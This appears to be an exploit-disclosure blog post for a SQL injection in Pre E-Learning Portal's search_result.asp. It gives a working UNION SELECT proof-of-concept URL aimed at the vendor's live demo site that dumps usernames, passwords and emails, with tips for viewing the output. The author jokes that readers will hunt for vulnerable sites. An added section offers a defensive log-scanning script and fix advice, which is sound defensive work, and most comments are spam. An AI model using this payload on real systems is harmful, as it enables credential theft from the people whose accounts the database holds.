Pre E-Learning Portal SQL Injection Vuln


[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/


[o] Vulnerable file
search_result.asp [ course_ID ]


[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]


[o] Proof of Concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#

Can't see the result? Press Ctrl+U to view the page source and scroll down. :p

big thanks to Vrs-hCk
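
For defenders running this application, the following added example (not part of the original post) scans web server logs for requests to search_result.asp whose course_ID is not a plain integer, which covers the injection shape shown above. The log layout, the sample lines and the rule that a course ID is a short decimal number are assumptions; the sample log is constructed, not real traffic.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log excerpt (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-05-01 10:00:01 GET /elearning/search_result.asp courses=1&course_ID=194 192.0.2.10 200
2010-05-01 10:00:07 GET /elearning/search_result.asp courses=1&course_ID=194+and+1=0+union+all+select+1,2,3 203.0.113.5 200
2010-05-01 10:00:09 GET /elearning/search_result.asp courses=1&COURSE_id=194%27 203.0.113.5 500
2010-05-01 10:00:12 GET /elearning/search_result.asp course_ID=194&course_ID=195 192.0.2.44 200
2010-05-01 10:00:15 GET /elearning/default.asp course_ID=1+or+1=1 192.0.2.10 200
"""

TARGET_STEM = "/search_result.asp"
TARGET_PARAM = "course_id"           # ASP looks parameter names up case-insensitively
INTEGER = re.compile(r"[0-9]{1,9}")  # assumed shape of a legitimate course ID


def course_id_as_asp_sees_it(query):
    """Decode the query string; join repeated values with ', ' as Request.QueryString does."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True)
              if k.lower() == TARGET_PARAM]
    return ", ".join(values) if values else None


def find_suspicious(log_text):
    """Return (client_ip, decoded_value) for search_result.asp hits with a non-integer course_ID."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if not row.get("cs-uri-stem", "").lower().endswith(TARGET_STEM):
            continue
        value = course_id_as_asp_sees_it(row.get("cs-uri-query", ""))
        if value is not None and not INTEGER.fullmatch(value):
            hits.append((row["c-ip"], value))
    return hits


if __name__ == "__main__":
    for ip, value in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\tcourse_ID={value!r}")
```

The same integer-only check, applied in search_result.asp before the value reaches the query and combined with a parameterized query, removes the injection point.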



33 Responses so far.

  1. Very nice. Thanks for sharing this and thanks to Vrs-hCk. I'm sure that lots of people will be happy with this.

  2. NoGe says:

    a lot of people will be searching for vulnerable sites too.. :))

  3. You sure that lots of people will be happy with this.

  4. I have been really glad after reading this blog as the knowledge which has been given via this blog is simply tremendous. I would congratulate and appreciate the blogger for doing this much hard work.

  5. Thanks for making such a cool post which is really very well written. I will be referring my friends to this article. Keep up your excellence and efficiency at this level.

  6. I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me.

  7. Hair says:

    Very informative. I really enjoyed while reading your post.


  8. This information is very good for me. Very special thanks to the author of this article.

  9. good to read this article, this is very informative for me.

  10. This post is very informative and helpful for me. I am happy to see this effort and great knowledge about the subject.

  11. This is winter jackets a really excellent study for me, Must acknowledge that you are one of the best web owners I ever saw. winter coats

  12. juliawells says:

    Well that's Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

  13. I just revenge of the fallen jacket discovered your website and desired to say that I have really experienced surfing around your posts shia la beouf clothing

  14. When i found your current weblog site on the search engines and also test just a few within your quick discussions. Proceed to maintain upward this very good use. When i simply additional upward your current Feed for you to my own WINDOWS LIVE MESSENGER Information Viewer.

  15. Well the Pre E-Learning Portal is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements to the search_result.asp script using the course_ID parameter.

  16. sandrasteve says:

    The SQL injection vulnerability in search_result.asp in Pre Projects Pre E-Learning Portal allows remote attackers to execute arbitrary SQL commands via the course_ID parameter. Thanks for sharing this great and very informative post with us.

  17. I believe this is a great site, you are working great on the content and quality of this site at the same time.

  18. wad jason says:

    This really is an awesome post, I’m happy I recently found it. I am looking forward to your next post.

  19. jakhoz says:

    I hardly ever write comments on blogs, but your article urged me to praise your blog. Thanks for the read, I will surely favorite your site and check in occasionally.


  20. jakhoz says:

    Awesome content, beneficial give good results, now I am aware that which you guys have been doing all this time.

  21. Great post... very informative for me. Thanks for sharing.

  22. I really love your website, it is so great. Of course, welcome to visit our website too.

  23. Primary focus of our company is on providing custom written essays. It is our aim to provide you with personalized academic assistance in preparing dissertation proposals, theses, literature reviews, MBA projects or reports.


  24. the large majority of excellent blogging site http://freeonlinecasinogamesx.webs.com online casino games